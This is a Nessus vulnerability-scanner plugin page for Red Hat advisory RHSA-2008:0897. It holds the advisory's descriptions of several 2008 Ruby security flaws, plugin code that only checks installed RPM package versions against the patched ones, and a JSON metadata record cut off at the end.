ID REDHAT-RHSA-2008-0897.NASL Type nessus Reporter This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2008-10-22T00:00:00
Description
Updated ruby packages that fix several security issues are now
available for Red Hat Enterprise Linux 4 and 5.
This update has been rated as having moderate security impact by the
Red Hat Security Response Team.
Ruby is an interpreted scripting language for quick and easy
object-oriented programming.
The Ruby DNS resolver library, resolv.rb, used predictable transaction
IDs and a fixed source port when sending DNS requests. A remote
attacker could use this flaw to spoof a malicious reply to a DNS
query. (CVE-2008-3905)
Ruby's XML document parsing module (REXML) was prone to a denial of
service attack via XML documents with large XML entity definitions
recursion. A specially crafted XML file could cause a Ruby application
using the REXML module to use an excessive amount of CPU and memory.
(CVE-2008-3790)
An insufficient 'taintness' check flaw was discovered in Ruby's DL
module, which provides direct access to the C language functions. An
attacker could use this flaw to bypass intended safe-level
restrictions by calling external C functions with the arguments from
an untrusted tainted inputs. (CVE-2008-3657)
A denial of service flaw was discovered in WEBrick, Ruby's HTTP server
toolkit. A remote attacker could send a specially crafted HTTP request
to a WEBrick server that would cause the server to use an excessive
amount of CPU time. (CVE-2008-3656)
A number of flaws were found in the safe-level restrictions in Ruby.
It was possible for an attacker to create a carefully crafted
malicious script that can allow the bypass of certain safe-level
restrictions. (CVE-2008-3655)
A denial of service flaw was found in Ruby's regular expression
engine. If a Ruby script tried to process a large amount of data via a
regular expression, it could cause Ruby to enter an infinite-loop and
crash. (CVE-2008-3443)
Users of ruby should upgrade to these updated packages, which contain
backported patches to resolve these issues.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Red Hat Security Advisory RHSA-2008:0897. The text
# itself is copyright (C) Red Hat, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(34466);
script_version("1.29");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/14");
script_cve_id("CVE-2008-1145", "CVE-2008-3443", "CVE-2008-3655", "CVE-2008-3656", "CVE-2008-3657", "CVE-2008-3790", "CVE-2008-3905", "CVE-2008-4310");
script_bugtraq_id(30644, 30682, 31699);
script_xref(name:"RHSA", value:"2008:0897");
script_name(english:"RHEL 4 / 5 : ruby (RHSA-2008:0897)");
script_summary(english:"Checks the rpm output for the updated packages");
script_set_attribute(
attribute:"synopsis",
value:"The remote Red Hat host is missing one or more security updates."
);
script_set_attribute(
attribute:"description",
value:
"Updated ruby packages that fix several security issues are now
available for Red Hat Enterprise Linux 4 and 5.
This update has been rated as having moderate security impact by the
Red Hat Security Response Team.
Ruby is an interpreted scripting language for quick and easy
object-oriented programming.
The Ruby DNS resolver library, resolv.rb, used predictable transaction
IDs and a fixed source port when sending DNS requests. A remote
attacker could use this flaw to spoof a malicious reply to a DNS
query. (CVE-2008-3905)
Ruby's XML document parsing module (REXML) was prone to a denial of
service attack via XML documents with large XML entity definitions
recursion. A specially crafted XML file could cause a Ruby application
using the REXML module to use an excessive amount of CPU and memory.
(CVE-2008-3790)
An insufficient 'taintness' check flaw was discovered in Ruby's DL
module, which provides direct access to the C language functions. An
attacker could use this flaw to bypass intended safe-level
restrictions by calling external C functions with the arguments from
an untrusted tainted inputs. (CVE-2008-3657)
A denial of service flaw was discovered in WEBrick, Ruby's HTTP server
toolkit. A remote attacker could send a specially crafted HTTP request
to a WEBrick server that would cause the server to use an excessive
amount of CPU time. (CVE-2008-3656)
A number of flaws were found in the safe-level restrictions in Ruby.
It was possible for an attacker to create a carefully crafted
malicious script that can allow the bypass of certain safe-level
restrictions. (CVE-2008-3655)
A denial of service flaw was found in Ruby's regular expression
engine. If a Ruby script tried to process a large amount of data via a
regular expression, it could cause Ruby to enter an infinite-loop and
crash. (CVE-2008-3443)
Users of ruby should upgrade to these updated packages, which contain
backported patches to resolve these issues."
);
script_set_attribute(
attribute:"see_also",
value:"https://access.redhat.com/security/cve/cve-2008-1145"
);
script_set_attribute(
attribute:"see_also",
value:"https://access.redhat.com/security/cve/cve-2008-3443"
);
script_set_attribute(
attribute:"see_also",
value:"https://access.redhat.com/security/cve/cve-2008-3655"
);
script_set_attribute(
attribute:"see_also",
value:"https://access.redhat.com/security/cve/cve-2008-3656"
);
script_set_attribute(
attribute:"see_also",
value:"https://access.redhat.com/security/cve/cve-2008-3657"
);
script_set_attribute(
attribute:"see_also",
value:"https://access.redhat.com/security/cve/cve-2008-3790"
);
script_set_attribute(
attribute:"see_also",
value:"https://access.redhat.com/security/cve/cve-2008-3905"
);
script_set_attribute(
attribute:"see_also",
value:"https://access.redhat.com/errata/RHSA-2008:0897"
);
script_set_attribute(attribute:"solution", value:"Update the affected packages.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_cwe_id(20, 22, 264, 287, 399);
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:irb");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:ruby");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:ruby-devel");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:ruby-docs");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:ruby-irb");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:ruby-libs");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:ruby-mode");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:ruby-rdoc");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:ruby-ri");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:ruby-tcltk");
script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:4");
script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:4.7");
script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:5");
script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:5.2");
script_set_attribute(attribute:"vuln_publication_date", value:"2008/03/04");
script_set_attribute(attribute:"patch_publication_date", value:"2008/10/21");
script_set_attribute(attribute:"plugin_publication_date", value:"2008/10/22");
script_set_attribute(attribute:"generated_plugin", value:"current");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"Red Hat Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list", "Host/cpu");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Red Hat" >!< release) audit(AUDIT_OS_NOT, "Red Hat");
os_ver = pregmatch(pattern: "Red Hat Enterprise Linux.*release ([0-9]+(\.[0-9]+)?)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat");
os_ver = os_ver[1];
if (! preg(pattern:"^(4|5)([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Red Hat 4.x / 5.x", "Red Hat " + os_ver);
if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "s390" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Red Hat", cpu);
yum_updateinfo = get_kb_item("Host/RedHat/yum-updateinfo");
if (!empty_or_null(yum_updateinfo))
{
rhsa = "RHSA-2008:0897";
yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);
if (!empty_or_null(yum_report))
{
security_report_v4(
port : 0,
severity : SECURITY_HOLE,
extra : yum_report
);
exit(0);
}
else
{
audit_message = "affected by Red Hat security advisory " + rhsa;
audit(AUDIT_OS_NOT, audit_message);
}
}
else
{
flag = 0;
if (rpm_check(release:"RHEL4", reference:"irb-1.8.1-7.el4_7.1")) flag++;
if (rpm_check(release:"RHEL4", reference:"ruby-1.8.1-7.el4_7.1")) flag++;
if (rpm_check(release:"RHEL4", reference:"ruby-devel-1.8.1-7.el4_7.1")) flag++;
if (rpm_check(release:"RHEL4", reference:"ruby-docs-1.8.1-7.el4_7.1")) flag++;
if (rpm_check(release:"RHEL4", reference:"ruby-libs-1.8.1-7.el4_7.1")) flag++;
if (rpm_check(release:"RHEL4", reference:"ruby-mode-1.8.1-7.el4_7.1")) flag++;
if (rpm_check(release:"RHEL4", reference:"ruby-tcltk-1.8.1-7.el4_7.1")) flag++;
if (rpm_check(release:"RHEL5", cpu:"i386", reference:"ruby-1.8.5-5.el5_2.5")) flag++;
if (rpm_check(release:"RHEL5", cpu:"s390x", reference:"ruby-1.8.5-5.el5_2.5")) flag++;
if (rpm_check(release:"RHEL5", cpu:"x86_64", reference:"ruby-1.8.5-5.el5_2.5")) flag++;
if (rpm_check(release:"RHEL5", reference:"ruby-devel-1.8.5-5.el5_2.5")) flag++;
if (rpm_check(release:"RHEL5", cpu:"i386", reference:"ruby-docs-1.8.5-5.el5_2.5")) flag++;
if (rpm_check(release:"RHEL5", cpu:"s390x", reference:"ruby-docs-1.8.5-5.el5_2.5")) flag++;
if (rpm_check(release:"RHEL5", cpu:"x86_64", reference:"ruby-docs-1.8.5-5.el5_2.5")) flag++;
if (rpm_check(release:"RHEL5", cpu:"i386", reference:"ruby-irb-1.8.5-5.el5_2.5")) flag++;
if (rpm_check(release:"RHEL5", cpu:"s390x", reference:"ruby-irb-1.8.5-5.el5_2.5")) flag++;
if (rpm_check(release:"RHEL5", cpu:"x86_64", reference:"ruby-irb-1.8.5-5.el5_2.5")) flag++;
if (rpm_check(release:"RHEL5", reference:"ruby-libs-1.8.5-5.el5_2.5")) flag++;
if (rpm_check(release:"RHEL5", cpu:"i386", reference:"ruby-mode-1.8.5-5.el5_2.5")) flag++;
if (rpm_check(release:"RHEL5", cpu:"s390x", reference:"ruby-mode-1.8.5-5.el5_2.5")) flag++;
if (rpm_check(release:"RHEL5", cpu:"x86_64", reference:"ruby-mode-1.8.5-5.el5_2.5")) flag++;
if (rpm_check(release:"RHEL5", cpu:"i386", reference:"ruby-rdoc-1.8.5-5.el5_2.5")) flag++;
if (rpm_check(release:"RHEL5", cpu:"s390x", reference:"ruby-rdoc-1.8.5-5.el5_2.5")) flag++;
if (rpm_check(release:"RHEL5", cpu:"x86_64", reference:"ruby-rdoc-1.8.5-5.el5_2.5")) flag++;
if (rpm_check(release:"RHEL5", cpu:"i386", reference:"ruby-ri-1.8.5-5.el5_2.5")) flag++;
if (rpm_check(release:"RHEL5", cpu:"s390x", reference:"ruby-ri-1.8.5-5.el5_2.5")) flag++;
if (rpm_check(release:"RHEL5", cpu:"x86_64", reference:"ruby-ri-1.8.5-5.el5_2.5")) flag++;
if (rpm_check(release:"RHEL5", cpu:"i386", reference:"ruby-tcltk-1.8.5-5.el5_2.5")) flag++;
if (rpm_check(release:"RHEL5", cpu:"s390x", reference:"ruby-tcltk-1.8.5-5.el5_2.5")) flag++;
if (rpm_check(release:"RHEL5", cpu:"x86_64", reference:"ruby-tcltk-1.8.5-5.el5_2.5")) flag++;
if (flag)
{
security_report_v4(
port : 0,
severity : SECURITY_HOLE,
extra : rpm_report_get() + redhat_report_package_caveat()
);
exit(0);
}
else
{
tested = pkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "irb / ruby / ruby-devel / ruby-docs / ruby-irb / ruby-libs / etc");
}
}
{"id": "REDHAT-RHSA-2008-0897.NASL", "bulletinFamily": "scanner", "title": "RHEL 4 / 5 : ruby (RHSA-2008:0897)", "description": "Updated ruby packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction\nIDs and a fixed source port when sending DNS requests. A remote\nattacker could use this flaw to spoof a malicious reply to a DNS\nquery. (CVE-2008-3905)\n\nRuby's XML document parsing module (REXML) was prone to a denial of\nservice attack via XML documents with large XML entity definitions\nrecursion. A specially crafted XML file could cause a Ruby application\nusing the REXML module to use an excessive amount of CPU and memory.\n(CVE-2008-3790)\n\nAn insufficient 'taintness' check flaw was discovered in Ruby's DL\nmodule, which provides direct access to the C language functions. An\nattacker could use this flaw to bypass intended safe-level\nrestrictions by calling external C functions with the arguments from\nan untrusted tainted inputs. (CVE-2008-3657)\n\nA denial of service flaw was discovered in WEBrick, Ruby's HTTP server\ntoolkit. A remote attacker could send a specially crafted HTTP request\nto a WEBrick server that would cause the server to use an excessive\namount of CPU time. (CVE-2008-3656)\n\nA number of flaws were found in the safe-level restrictions in Ruby.\nIt was possible for an attacker to create a carefully crafted\nmalicious script that can allow the bypass of certain safe-level\nrestrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression\nengine. If a Ruby script tried to process a large amount of data via a\nregular expression, it could cause Ruby to enter an infinite-loop and\ncrash. (CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.", "published": "2008-10-22T00:00:00", "modified": "2008-10-22T00:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "href": "https://www.tenable.com/plugins/nessus/34466", "reporter": "This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://access.redhat.com/errata/RHSA-2008:0897", "https://access.redhat.com/security/cve/cve-2008-3905", "https://access.redhat.com/security/cve/cve-2008-3657", "https://access.redhat.com/security/cve/cve-2008-3656", "https://access.redhat.com/security/cve/cve-2008-3790", "https://access.redhat.com/security/cve/cve-2008-3443", "https://access.redhat.com/security/cve/cve-2008-3655", "https://access.redhat.com/security/cve/cve-2008-1145"], "cvelist": ["CVE-2008-3655", "CVE-2008-3443", "CVE-2008-4310", "CVE-2008-1145", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "type": "nessus", "lastseen": "2021-01-17T13:06:18", "edition": 27, "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["ORACLELINUX_ELSA-2008-0897.NASL", "SL_20081021_RUBY_ON_SL3_X.NASL", "FEDORA_2008-8738.NASL", "DEBIAN_DSA-1651.NASL", "SUSE_11_RUBY-090703.NASL", "UBUNTU_USN-651-1.NASL", "CENTOS_RHSA-2008-0897.NASL", "MANDRIVA_MDVSA-2008-226.NASL", "DEBIAN_DSA-1652.NASL", "FEDORA_2008-8736.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310880070", "OPENVAS:61774", "OPENVAS:880070", "OPENVAS:830489", "OPENVAS:1361412562310830489", "OPENVAS:880222", "OPENVAS:1361412562310122548", "OPENVAS:870035", "OPENVAS:1361412562310870035", "OPENVAS:1361412562310880222"]}, {"type": "oraclelinux", "idList": ["ELSA-2008-0981", "ELSA-2008-0897", "ELSA-2008-0896"]}, {"type": "centos", "idList": ["CESA-2008:0897", "CESA-2008:0896", "CESA-2008:0981", "CESA-2008:0895-02"]}, {"type": "redhat", "idList": ["RHSA-2008:0895", "RHSA-2008:0981", "RHSA-2008:0897", "RHSA-2008:0896"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1652-1:B2D5C", "DEBIAN:DSA-1651-1:0FC77"]}, {"type": "cve", "idList": ["CVE-2008-3657", "CVE-2008-3656", "CVE-2008-4310", "CVE-2008-3443", "CVE-2008-3905", "CVE-2008-3655", "CVE-2008-1145", "CVE-2008-3790"]}, {"type": "ubuntu", "idList": ["USN-651-1", "USN-691-1"]}, {"type": "freebsd", "idList": ["F7BA20AA-6B5A-11DD-9D79-001FC61C2A55", "C329712A-6B5B-11DD-9D79-001FC61C2A55"]}, {"type": "fedora", "idList": ["FEDORA:44ED1208741", "FEDORA:1583020874A"]}, {"type": "suse", "idList": ["SUSE-SA:2009:037"]}, {"type": "exploitdb", "idList": ["EDB-ID:32222", "EDB-ID:32223"]}, {"type": "gentoo", "idList": ["GLSA-200812-17"]}], "modified": "2021-01-17T13:06:18", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-01-17T13:06:18", "rev": 2}, "vulnersScore": 7.7}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0897. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34466);\n script_version(\"1.29\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1145\", \"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3657\", \"CVE-2008-3790\", \"CVE-2008-3905\", \"CVE-2008-4310\");\n script_bugtraq_id(30644, 30682, 31699);\n script_xref(name:\"RHSA\", value:\"2008:0897\");\n\n script_name(english:\"RHEL 4 / 5 : ruby (RHSA-2008:0897)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated ruby packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction\nIDs and a fixed source port when sending DNS requests. A remote\nattacker could use this flaw to spoof a malicious reply to a DNS\nquery. (CVE-2008-3905)\n\nRuby's XML document parsing module (REXML) was prone to a denial of\nservice attack via XML documents with large XML entity definitions\nrecursion. A specially crafted XML file could cause a Ruby application\nusing the REXML module to use an excessive amount of CPU and memory.\n(CVE-2008-3790)\n\nAn insufficient 'taintness' check flaw was discovered in Ruby's DL\nmodule, which provides direct access to the C language functions. An\nattacker could use this flaw to bypass intended safe-level\nrestrictions by calling external C functions with the arguments from\nan untrusted tainted inputs. (CVE-2008-3657)\n\nA denial of service flaw was discovered in WEBrick, Ruby's HTTP server\ntoolkit. A remote attacker could send a specially crafted HTTP request\nto a WEBrick server that would cause the server to use an excessive\namount of CPU time. (CVE-2008-3656)\n\nA number of flaws were found in the safe-level restrictions in Ruby.\nIt was possible for an attacker to create a carefully crafted\nmalicious script that can allow the bypass of certain safe-level\nrestrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression\nengine. If a Ruby script tried to process a large amount of data via a\nregular expression, it could cause Ruby to enter an infinite-loop and\ncrash. (CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-1145\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-3443\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-3655\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-3656\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-3657\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-3790\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-3905\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2008:0897\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 22, 264, 287, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-mode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-rdoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-ri\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-tcltk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/03/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2008:0897\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"irb-1.8.1-7.el4_7.1\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"ruby-1.8.1-7.el4_7.1\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"ruby-devel-1.8.1-7.el4_7.1\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"ruby-docs-1.8.1-7.el4_7.1\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"ruby-libs-1.8.1-7.el4_7.1\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"ruby-mode-1.8.1-7.el4_7.1\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"ruby-tcltk-1.8.1-7.el4_7.1\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"ruby-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"ruby-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"ruby-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"ruby-devel-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"ruby-docs-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"ruby-docs-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"ruby-docs-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"ruby-irb-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"ruby-irb-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"ruby-irb-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"ruby-libs-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"ruby-mode-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"ruby-mode-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"ruby-mode-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"ruby-rdoc-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"ruby-rdoc-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"ruby-rdoc-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"ruby-ri-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"ruby-ri-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"ruby-ri-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"ruby-tcltk-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"ruby-tcltk-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"ruby-tcltk-1.8.5-5.el5_2.5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"irb / ruby / ruby-devel / ruby-docs / ruby-irb / ruby-libs / etc\");\n }\n}\n", "naslFamily": "Red Hat Local Security Checks", "pluginID": "34466", "cpe": ["p-cpe:/a:redhat:enterprise_linux:irb", "cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:ruby", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:ruby-rdoc", "p-cpe:/a:redhat:enterprise_linux:ruby-irb", "p-cpe:/a:redhat:enterprise_linux:ruby-docs", "p-cpe:/a:redhat:enterprise_linux:ruby-ri", 